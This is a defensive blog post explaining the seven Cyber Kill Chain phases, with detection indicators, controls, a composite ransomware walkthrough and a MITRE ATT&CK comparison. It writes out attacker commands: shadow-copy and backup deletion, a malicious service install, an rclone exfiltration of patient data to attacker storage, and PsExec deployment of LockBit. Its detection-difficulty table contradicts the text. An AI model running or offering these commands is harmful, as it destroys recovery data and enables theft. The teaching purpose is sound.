Cyber Kill Chain: All 7 Phases Explained with Real Attack Examples (2026)
A technical deep-dive into the Cyber Kill Chain — all 7 phases mapped with real attacker techniques, detection indicators, and defensive controls. Includes a full real-world attack walkthrough and Kill Chain vs MITRE ATT&CK comparison.
In 2020, a ransomware gang spent 11 days inside a hospital network before anyone noticed. By the time the alert fired, they had already exfiltrated 250 GB of patient data, deleted every shadow copy, and staged the encryptor on 1,200 endpoints. The ransom demand: $67 million.
Every step of that intrusion was predictable. Every step had a detection opportunity. And almost every one was missed — not because the tools weren't there, but because no one had mapped the attack sequence to their defenses.
That's exactly what the Cyber Kill Chain is for.
Developed by Lockheed Martin in 2011 and based on military targeting doctrine, the Cyber Kill Chain® framework defines the 7 sequential phases every attacker must complete to achieve their objectives. The core principle is operationally powerful: disrupt any single phase and the entire attack fails.
This post covers all 7 kill chain phases with real attacker tooling, IOCs to hunt for, defensive controls at each stage, a full real-world attack walkthrough, and a practical comparison of Kill Chain vs MITRE ATT&CK.
TL;DR — Cyber Kill Chain 7 Phases
Phase 1 – Reconnaissance → Attacker gathers intelligence (OSINT, email harvesting)
Phase 2 – Weaponization → Malware + exploit combined into a deliverable payload
Phase 3 – Delivery → Payload sent via phishing, USB, watering hole
Phase 4 – Exploitation → Vulnerability triggered, code executes on victim system
Phase 5 – Installation → Backdoor / persistence mechanism installed
Phase 6 – Command & Control → C2 channel established for remote access and tasking
Phase 7 – Actions on Objectives → Exfiltration, ransomware deployment, destruction
Break the chain at any phase → attack fails. The earlier you break it, the lower the cost.
Phase 1: Reconnaissance
The attacker maps the target before sending a single packet. Reconnaissance is entirely passive from the defender's perspective — no logs are generated, no alerts fire. It is simultaneously the hardest phase to detect and the easiest to limit through attack surface management.
What attackers do:
- Email harvesting — tools like theHarvester and Hunter.io enumerate employee email addresses from public sources. These become spearphishing targets.
- Subdomain enumeration — passive DNS, certificate transparency logs (crt.sh), and tools like
amasssurface forgotten dev/staging environments and exposed internal services. - LinkedIn / social media profiling — job postings reveal technology stacks and internal tooling. Employee profiles expose org hierarchy, project names, and reporting relationships — all useful for pretexting.
- Shodan / Censys — internet-wide scan databases let attackers find exposed ports, service banners, and software versions without generating a single connection log on your side.
# Attacker tooling commonly seen in this phase
theHarvester -d target.com -b all # email, subdomain enumeration
amass enum -passive -d target.com # passive subdomain mapping
shodan search "org:TargetCompany" # find exposed services without touching them
What to watch for: You won't see this phase in your logs. The right approach is to run the same tools against your own infrastructure before the attacker does. If theHarvester returns 200 employee emails, the attacker has them too.
Defensive posture:
- Run periodic OSINT assessments against your own domain (treat it as a red team exercise)
- Standardize email format — mixing
first.last@andfirstlast@makes enumeration trivial - Remove unnecessary service banners and metadata from public-facing infrastructure
- Limit what job postings reveal about internal technology stack
Phase 2: Weaponization
With target intelligence in hand, the attacker builds or procures their weapon. This phase happens entirely off your network — there is no detection opportunity. Your defenses need to catch the artifact when it arrives, not when it's built.
What attackers do:
- Malicious Office documents — macros or VBA scripts embedded in
.docx/.xlsfiles, executing on open. Despite macro execution controls improving, this remains one of the highest-volume initial access vectors due to user bypass. - Trojanized executables — legitimate-looking binaries with embedded malware, sometimes signed with stolen code-signing certificates to pass AV checks and user scrutiny.
- Custom implant development — APT groups (APT29, Lazarus Group, APT41) develop bespoke malware per campaign to defeat signature detection. SUNBURST, the implant used in the SolarWinds supply chain attack, operated undetected for over 9 months inside government and enterprise networks.
- Ransomware-as-a-Service (RaaS) — criminal affiliates purchase pre-built payloads (LockBit 3.0, BlackCat/ALPHV, Cl0p) from darkweb markets. RaaS has commoditized sophisticated attack capability, lowering the technical bar significantly.
The attacker also selects and registers C2 infrastructure at this stage — a decision that shapes detection risk in Phase 6.
Defensive posture:
- Subscribe to threat intelligence feeds (MISP, OpenCTI, commercial TI) to surface known malware families and IOCs before delivery
- Use behavioral sandbox analysis (ANY.RUN, Cuckoo, Joe Sandbox) — hash-based detection misses custom malware entirely
- Monitor certificate transparency logs for newly registered lookalike domains targeting your brand
Phase 3: Delivery
The payload reaches the victim. This is the first genuine detection opportunity — the attacker must interact with your environment for the first time.
The three primary delivery vectors:
Phishing / Spearphishing Email
The dominant delivery method across virtually every threat actor category. Spearphishing is personalized with reconnaissance data — sender spoofed as a known contact, content referencing real internal context.
Attack scenario:
1. Attacker identifies CFO + their accountant's name via LinkedIn
2. Registers lookalike domain: acc0untant-corp.com (zero instead of O)
3. Sends fake "Invoice Q1-2026.xlsx" with embedded macro to CFO
4. CFO opens attachment → macro executes → Meterpreter session established
USB / Removable Media
Physical delivery with surprisingly high success rates. The 2022 FIN7 campaign involved USB drives mailed to US defense and transportation companies posing as Best Buy gift packages. Stuxnet — still the most sophisticated cyberweapon ever publicly analyzed — used infected USB drives to cross air-gapped networks inside Iranian nuclear facilities at Natanz.
Watering Hole Attack
The attacker compromises a website the target community regularly visits, injecting a drive-by download exploit. The victim navigates to a legitimate-looking site and the payload executes silently. Highly effective against specific industries where browsing patterns are predictable: security researcher blogs, defense contractor portals, industry-specific trade forums.
Defensive posture:
- Email security gateway with sandbox detonation (Proofpoint, Mimecast, Microsoft Defender for Office 365)
- URL filtering and DNS-based blocking (Cisco Umbrella, Cloudflare Gateway)
- Disable macros by default via Group Policy; enforce Attack Surface Reduction (ASR) rules
- Phishing simulation programs (KnowBe4, Proofpoint Security Awareness) — measurably reduce click rates over time
Phase 4: Exploitation
The payload executes. The attacker triggers a vulnerability — in software, OS, firmware, or human behavior — to gain an initial foothold on the target system.
Common exploitation techniques:
- User-triggered execution — victim opens attachment, clicks link, runs a downloaded file. The majority of commodity phishing campaigns rely on this; no CVE required.
- Zero-day exploits — unknown vulnerabilities with no available patch. Zero detection opportunity at point of exploitation. High acquisition cost means these are typically reserved for nation-state operations targeting high-value individuals or critical infrastructure.
- Public-facing service exploitation — unpatched vulnerabilities in perimeter devices and enterprise software:
- CVE-2021-44228 (Log4Shell) — unauthenticated RCE in Apache Log4j, impacted millions of systems across virtually every industry
- CVE-2021-26855 (ProxyLogon) — pre-authentication RCE in Microsoft Exchange, exploited by HAFNIUM and multiple other APT groups
- CVE-2023-4966 (Citrix Bleed) — session token leakage in Citrix NetScaler, exploited within days of disclosure
- Post-exploitation lateral movement — after initial access, attackers pivot internally using credential theft (Pass-the-Hash, Kerberoasting), abused trust relationships, or misconfigured services. Mapped under MITRE ATT&CK Lateral Movement tactic (TA0008).
Defensive posture:
- Prioritize patching using the CISA KEV (Known Exploited Vulnerabilities) catalog — not CVSS score alone
- EDR with behavioral detection (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint)
- Network segmentation and micro-segmentation to contain blast radius
- Principle of least privilege — every account should have only the access required for its function
Phase 5: Installation
Initial access achieved. Now the attacker establishes persistence — guaranteeing re-entry even if the vulnerability is patched, the system reboots, or the initial session is detected and removed.
Persistence mechanisms:
Web Shells
Malicious scripts (PHP, ASPX, JSP) planted on compromised web servers. The file extension blends with legitimate application content, making detection without FIM or behavioral monitoring extremely difficult.
<!-- Web shell concept — detection awareness only, not functional -->
<!-- Typically: single-line scripts accepting OS commands via HTTP GET/POST parameters -->
<!-- Hunt for: .php files in non-standard web directories, anomalous file creation events -->
<!-- Event to monitor: Sysmon Event ID 11 (FileCreate) in web server directories -->
Registry Run Keys / Startup Folder
# Attacker writes malicious entry to persist across reboots
# MITRE ATT&CK T1547.001
HKCU\Software\Microsoft\Windows\CurrentVersion\Run → executes per user logon
HKLM\Software\Microsoft\Windows\CurrentVersion\Run → executes for all users
# Detection: monitor registry write events (Sysmon Event ID 13)
# Tool: Autoruns (Sysinternals) to baseline and diff Run key entries
Windows Service Creation
# Attacker creates a service with a legitimate-sounding name
# MITRE ATT&CK T1543.003
sc.exe create "WindowsUpdateHelper" binPath= "C:\Windows\Temp\svchost32.exe" start= auto
# Detection: Windows Event ID 7045 (new service installed)
# Hunt for: services with binaries outside System32, recently created services
Timestomping
Attackers modify file metadata — creation, modification, and last-access timestamps — to make malicious files appear legitimate and defeat forensic timeline analysis. MITRE ATT&CK T1070.006.
Defensive posture:
- File Integrity Monitoring (FIM) — Wazuh, OSSEC, Tripwire; alert on changes to sensitive directories
- Audit Startup folder and Run keys against a known-good baseline (Autoruns from Sysinternals)
- Alert on Windows Event ID 7045 (new service created)
- Application whitelisting via WDAC or AppLocker to block execution of unauthorized binaries
- Deploy Sysmon with a hardened config (SwiftOnSecurity or Olaf Hartong's modular config)
Phase 6: Command & Control (C2)
Persistence established. The compromised host now beacons — periodically checking in with attacker-controlled infrastructure to receive commands and stage exfiltrated data. The attacker has full keyboard access to the victim machine via an encrypted, covert channel.
Modern C2 channels:
HTTPS Beaconing (Most Common)
Malicious traffic blends with legitimate HTTPS on port 443. Tools like Cobalt Strike use "malleable C2 profiles" that mimic known CDN traffic patterns (Amazon, Akamai, Microsoft) at both the TLS handshake and HTTP request layer.
Detection indicators to hunt:
- Regular, low-variance beaconing intervals (every 60s, 300s)
→ Legitimate user traffic is irregular; malware beacons like a clock
- Unusual or recently issued TLS certificates on internal hosts
- High-volume POST requests to newly registered or low-reputation domains
- Cobalt Strike default: /submit.php endpoint, specific JA3 hash
DNS Tunneling
Data encoded within DNS query names, resolved against an attacker-controlled authoritative DNS server. Effective because DNS is almost never blocked at the enterprise perimeter.
# Detection: hunt for these DNS anomalies in your DNS logs
- Subdomain labels > 50 characters (encoded data)
- High query frequency to a single second-level domain
- Uncommon record types in responses (TXT, NULL, CNAME chains)
- Known tools: dnscat2, iodine, DNSExfiltrator, AAAA-encoded payloads
Domain Fronting
C2 traffic is routed through a trusted CDN (AWS CloudFront, Azure CDN, Cloudflare) using the CDN's legitimate IP address. The true destination is specified in the encrypted Host header. Your firewall logs show a connection to Amazon. The data reaches the attacker.
Defensive posture:
- Network Traffic Analysis — Zeek, Suricata, Darktrace for behavioral anomaly detection
- DNS monitoring and DGA (Domain Generation Algorithm) detection via frequency analysis
- JA3/JA3S TLS fingerprinting to identify known C2 frameworks (Cobalt Strike, Sliver, Havoc)
- Egress filtering — explicit allowlist for outbound destinations from sensitive network segments
- SSL/TLS inspection on forward proxy for non-exempted traffic categories
Phase 7: Actions on Objectives
All prior phases exist to enable this one. The attacker executes their actual mission. Objectives vary significantly by threat actor type:
| Threat Actor | Primary Objective |
|---|---|
| Ransomware group (Cl0p, LockBit) | Exfiltrate data → encrypt → double extortion |
| Nation-state APT (APT29, APT41) | Long-term espionage, IP theft, persistence |
| Hacktivist | Public disruption, defacement, data leaks |
| Insider threat | Targeted data theft, sabotage |
| Financial crime (FIN7, FIN11) | Credential theft, BEC fraud, wire transfers |
Common actions:
- Data exfiltration — sensitive files staged, compressed, and encrypted locally, then transferred over the C2 channel. In modern ransomware operations, exfiltration happens before encryption for double extortion leverage.
- Privilege escalation — moving from standard user to Domain Admin. Common techniques: Kerberoasting, Pass-the-Hash, DCSync, token impersonation, exploiting misconfigured sudo or delegation.
- Shadow Copy deletion — near-universal first step in ransomware deployment. Eliminates Windows recovery options.
# Consistently observed in ransomware incidents prior to encryption
vssadmin delete shadows /all /quiet # delete volume shadow copies
wbadmin delete catalog -quiet # destroy Windows Server backup catalog
bcdedit /set {default} recoveryenabled No # disable recovery mode
- Lateral movement to high-value targets — domain controllers, backup infrastructure, finance systems, and certificate authorities are primary pivot targets.
- Destructive attacks — nation-state wipers (HermeticWiper used in Ukraine 2022, NotPetya 2017) overwrite the MBR and file contents. Designed to destroy evidence or cause maximum operational impact rather than financial gain.
Defensive posture:
- Immutable, offline backups — 3-2-1 rule (3 copies, 2 different media types, 1 offsite). Test restores on a defined schedule; an untested backup is not a backup.
- UEBA (User and Entity Behavior Analytics) to surface anomalous access patterns (Exabeam, Splunk UBA)
- DLP (Data Loss Prevention) to alert on large-volume data staging or transfers
- Privileged Access Workstations (PAW) + tiered administration model to contain lateral movement
- Rehearsed Incident Response plan — tabletop exercises quarterly minimum
Real-World Cyber Kill Chain Example: Ransomware Attack Walkthrough
This is a composite walkthrough based on publicly documented ransomware TTPs (CISA advisories, Mandiant M-Trends, CrowdStrike reporting). No single incident — combined to illustrate how all 7 phases connect in practice.
Target: Regional healthcare provider, ~3,000 employees
Phase 1 — Reconnaissance (Day 1–3)
The threat actor identifies the organization via a healthcare industry targeting list. Using theHarvester and LinkedIn, they enumerate 400+ employee emails and identify the IT Director by name. A Shodan search returns a Citrix NetScaler appliance running a version vulnerable to CVE-2023-4966 (Citrix Bleed).
Phase 2 — Weaponization (Day 4–5)
The group is a RaaS affiliate using LockBit 3.0. The encryptor is pre-built. The affiliate configures a Cobalt Strike listener with an HTTPS malleable profile mimicking Microsoft Azure CDN traffic. C2 domain registered 6 days ago, hosted on a bulletproof hosting provider.
Phase 3 — Delivery (Day 6)
Rather than phishing, the attacker exploits the vulnerable Citrix appliance directly — no user interaction required. CVE-2023-4966 allows unauthenticated session token extraction. The attacker hijacks an active VPN session belonging to an IT administrator.
Phase 4 — Exploitation (Day 6, same day)
With a valid admin VPN session, the attacker authenticates to the Citrix gateway and accesses the internal network as a legitimate privileged user. No vulnerability triggered on internal systems — they walked in through the front door.
Phase 5 — Installation (Day 6–7)
The attacker deploys a Cobalt Strike beacon on a domain-joined Windows server. Persistence is established via a new Windows service (WindowsTelemetryHelper) and a registry Run key on a backup server. Timestomping applied to beacon DLL — file appears created 8 months prior.
Phase 6 — Command & Control (Day 6–17)
The beacon checks in every 5 minutes with 15% jitter over HTTPS to a domain fronted through Cloudflare. Eleven days of undetected activity: the attacker conducts internal reconnaissance, dumps LSASS for credential harvesting, moves laterally to the domain controller, and locates backup infrastructure.
# Attacker activity observed during C2 phase
net group "Domain Admins" /domain # enumerate privileged groups
Get-ADComputer -Filter * | Select Name # list all domain-joined systems
wmic /node:[backup-server] process call create "cmd.exe /c whoami"
Phase 7 — Actions on Objectives (Day 17–18)
With Domain Admin credentials and access to all systems:
# Exfiltration: 250 GB staged and sent via rclone to attacker cloud storage
rclone copy \\fileserver\patientdata\ remote:exfil-bucket --transfers 32
# Backup destruction before encryption
vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
# LockBit 3.0 deployed via PsExec to 1,200 endpoints simultaneously
PsExec.exe \\[target] -c -f -d LockBit3.exe --silent
Ransom demand: $4.2 million. Recovery time without tested backups: estimated 3–5 weeks of partial operations.
Where the chain could have been broken:
- Phase 1: Vulnerable Citrix version visible on Shodan — patch or restrict access
- Phase 3/4: CVE-2023-4966 was in CISA KEV 11 days before this attack
- Phase 6: Cobalt Strike beacon beaconing at regular intervals — NTA or EDR telemetry would have caught this
- Phase 7: Shadow copy deletion is a high-confidence ransomware indicator — alert on
vssadmin deleteimmediately
Cyber Kill Chain vs MITRE ATT&CK
One of the most common questions in threat modeling discussions is where these two frameworks fit relative to each other. They are complementary, not competing.
| Dimension | Cyber Kill Chain | MITRE ATT&CK |
|---|---|---|
| Created by | Lockheed Martin (2011) | MITRE Corporation (2013) |
| Structure | 7 sequential phases | 14 tactics, 400+ techniques |
| Granularity | Strategic / phase-level | Tactical / technique-level |
| Best used for | Measuring defense coverage across an attack lifecycle | Detection engineering, threat hunting, red team planning |
| Attacker model | Single linear intrusion | Non-linear, technique-level behavior |
| Insider threat coverage | Poor (skips Phases 1–4) | Good (covers all behaviors post-access) |
| Tooling | N/A | ATT&CK Navigator, threat intel platforms |
How to use both together:
Use the Kill Chain to answer the strategic question: "At which phases do we have coverage, and where are the gaps?"
Use MITRE ATT&CK to answer the tactical question: "For a given phase, which specific techniques should we detect, and how?"
For example: Kill Chain Phase 5 (Installation) maps to ATT&CK techniques including T1547.001 (Registry Run Keys), T1543.003 (Create/Modify System Process), T1070.006 (Timestomping), and T1505.003 (Web Shell). ATT&CK gives you the detection logic; the Kill Chain gives you the strategic context.
→ See also: MITRE ATT&CK Explained: Tactics, Techniques, and How to Use the Navigator
Breaking the Chain: Defense Coverage by Phase
| Phase | Detection Difficulty | Primary Controls |
|---|---|---|
| Reconnaissance | Very Low | OSINT self-assessment, attack surface reduction |
| Weaponization | None | Threat intel feeds, sandbox detonation |
| Delivery | High | Email gateway + sandbox, URL filtering, macro policy |
| Exploitation | Medium | EDR behavioral detection, patch management (CISA KEV) |
| Installation | Medium | FIM, Sysmon, autoruns baselining, app whitelisting |
| Command & Control | High | NTA, DNS monitoring, JA3 fingerprinting, egress filtering |
| Actions on Objectives | Medium | Offline backups (tested), UEBA, DLP, IR runbooks |
The goal is defense in depth: no single phase should rely on a single control. Assume breach at every layer and ensure the next layer catches what the previous missed.
Common Mistakes When Applying the Cyber Kill Chain
Mistake 1: Treating it as a linear checklist Real intrusions aren't always perfectly sequential. Attackers may loop back to reconnaissance post-exploitation (internal recon ≠ external recon), or skip phases when they have valid credentials from the start (e.g., phished MFA codes, purchased access from an Initial Access Broker).
Mistake 2: Over-indexing on late-stage detection Most security programs invest heavily in Exploitation and beyond — that's where EDR and SIEM shine. Delivery-phase controls (email sandboxing, phishing simulation, macro policy) often have higher ROI and stop attacks before any code runs.
Mistake 3: Ignoring Weaponization-phase intelligence ISAC (Information Sharing and Analysis Center) memberships and TI feeds often surface malware campaigns and C2 infrastructure before they hit your perimeter. Early warning at Phase 2 eliminates the attack before it reaches your environment.
Mistake 4: No tested backup and recovery Backup infrastructure that's documented but never restored from is not a recovery capability. Shadow Copy deletion + no tested offline backup = paying the ransom or rebuilding from scratch.
Mistake 5: Treating LotL as a blind spot Living-off-the-land techniques (PowerShell, WMI, certutil, mshta) blur phase boundaries and evade signature detection. Behavioral detection rules and PowerShell Script Block Logging (Event ID 4104) are essential to counter this.
Conclusion
Every major breach follows a predictable sequence. The Cyber Kill Chain gives you a framework to map your defenses to that sequence and find the gaps before an attacker exploits them.
The 7 kill chain phases aren't just academic categories — they're decision points. At each one, you either have a control in place that raises the cost for the attacker, or you don't. If your detection coverage only starts at Exploitation, you've already handed the attacker four uncontested phases.
Map your controls to the Kill Chain. Find the gaps. Prioritize fixes by attacker advantage — not by implementation effort.
→ Related: MITRE ATT&CK Explained: Tactics vs Techniques — the granular companion to the Kill Chain. → Related: What is a SOC? Roles, Tools, and Detection Workflows — how a SOC operationalizes Kill Chain detection at scale.
FAQ — Cyber Kill Chain
What is the Cyber Kill Chain?
The Cyber Kill Chain is a cybersecurity framework that models the 7 sequential phases an attacker must complete to successfully execute a cyberattack: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, and Actions on Objectives. Originally developed by Lockheed Martin in 2011, it is used by security teams to map defensive controls to attacker behavior and identify coverage gaps.
Who created the Cyber Kill Chain?
The Cyber Kill Chain® was created by Lockheed Martin and published in their 2011 paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" by Eric Hutchins, Michael Cloppert, and Rohan Amin. It adapted the military concept of a "kill chain" — the sequence of steps required to engage a target — to the cyber intrusion domain.
Is the Cyber Kill Chain still relevant in 2026?
Yes, with caveats. The Kill Chain remains a valuable strategic framework for security program design and defense coverage measurement. Its limitations are well-understood: it models a single linear intrusion and doesn't account well for insider threats, living-off-the-land techniques, or non-linear attack sequences. In practice, most security teams use it alongside MITRE ATT&CK — the Kill Chain for strategic phase coverage, ATT&CK for technique-level detection engineering.
What is the difference between the Cyber Kill Chain and MITRE ATT&CK?
The Kill Chain provides a 7-phase strategic model of a complete attack lifecycle. MITRE ATT&CK provides granular coverage of 400+ individual adversary techniques across 14 tactics. They operate at different levels of abstraction and are best used together: the Kill Chain to identify which phases lack defensive coverage, ATT&CK to specify what behaviors to detect within those phases.
Why is the Cyber Kill Chain important for defenders?
Because it shifts the defensive mindset from reactive to proactive. Rather than waiting for an alert at Exploitation or later, the Kill Chain makes visible that there are detection opportunities as early as Delivery and Reconnaissance. It also frames defense as a cost-imposition problem: every control you add at every phase increases attacker effort and probability of detection — even if no single control is perfect. For SOC analysts, threat hunters, and IR teams, thinking in kill chain phases accelerates triage and focuses containment.
How many phases are in the Cyber Kill Chain?
The Cyber Kill Chain consists of 7 phases: (1) Reconnaissance, (2) Weaponization, (3) Delivery, (4) Exploitation, (5) Installation, (6) Command & Control, and (7) Actions on Objectives.
Tags: #cybersecurity #threatintel #blueteam #redteam #killchain #incidentresponse #apt #ransomware